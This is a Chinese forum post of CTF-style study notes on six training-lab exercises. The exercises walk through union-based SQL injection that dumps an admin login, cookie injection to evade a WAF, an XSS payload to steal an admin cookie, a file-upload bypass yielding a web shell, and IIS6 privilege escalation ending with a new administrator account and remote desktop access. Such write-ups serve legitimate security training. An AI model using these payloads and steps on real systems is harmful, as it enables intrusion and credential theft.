Newgate公开课学习笔记

Newgate   ·   发表于 2018-06-13 16:38:46   ·   CTF&WP专版

学习笔记,公开课1

         目标网站:http://120.203.13.111:6815/

点击新闻1,发现网址变成了http://120.203.13.111:6815/?id=1,进行了传参,于是尝试注入,输入’    返回错误

输入http://120.203.13.111:6815/?id=1 and 1=1   返回正常

输入http://120.203.13.111:6815/?id=1 and 1=2  返回错误,从而断定存在注入

存在注入之后,输入and  1=1 order by 1 返回正常 and 1=1 order by 2 返回正常

输入and 1=1 order by 3 时,返回错误,断定字段数位2

于是输入 ?id =3 and 1=1 union select 1,2   发现字段2能在网页中正常显示,这时候插入sql语句?id =3 and 1=1 union select 1,version()发现数据库版本为5.5.53

语句?id=3 and 1=1 union select 1,database()发现数据库名为maoshe

语句?id=3 and 1=1 union select 1,user()发现数据库账号为maoshe@localhost

于是尝试注入数据库表

语句?id=3 and 1=1 union select 1,table_name from information_schema.tables where table_schema=’maoshe’

发现表admin 

输入?id=5 union select 1,group_concat(COLUMN_NAME, 0x3c2f62723e) from information_schema.COLUMNS where TABLE_NAME='admin'

发现idusernamepassword,三个字段

输入?id=5 union select 1,group_concat(username,0x3c2f62723e,password) from admin

发现username=admin password=hellohack

拿到flag

 

学习笔记,公开课2

http://120.203.13.111:8001/shownews.asp?id=170%20order%20by%2010  返回正常

http://120.203.13.111:8001/shownews.asp?id=170%20order%20by%2011  返回错误,断定10个字段

http://120.203.13.111:8001/shownews.asp?id=170%20union%20select%201,2,3,4,5,6,7,8,9,10waf拦截,于是尝试cookie注入

?id=170 union select 1,2,3,4,5,6,7,8,9,10成功

?id=172+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

获得用户名admin 密码b9a2a2b5dffb918c   md5查询结果为welcome

 

 

 

 

 

学习笔记,公开课3

登录网站后发现,提示很明显,于是修改cookiereferer,则成功登陆

 

 

 

 

学习笔记,公开课4

登陆网站尝试注入<script>alert(/xss/)</script>发现存在跨站漏洞,于是登陆xss9,构造代码,注入,获得管理员cookie,拿到

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

学习笔记,公开课5

上传,上传过程先尝试.asp发现不行,于是把jspasp文件合成成图片,成功上传后发现不解析,于是尝试更改文件后缀,把.jsp文件后缀更改成.cer,成功上传,成功链接菜刀,拿到shell

 

 

 

 

 

 

 

 

学习笔记,公开课6

执行虚拟终端,尝试net user命令,显示没有权限,于是上传cmd.exe执行net user 发现权限不够,根据iis6.0服务器存在的漏洞,上传iis6.exe,执行net user,发现系统权限,于是创建用户并提升至管理员组,远程链接3389端口,成功远程连接,进入c盘拿到shell









打赏我,让我更有动力~

0 条回复   |  直到 2018-6-13 | 1159 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.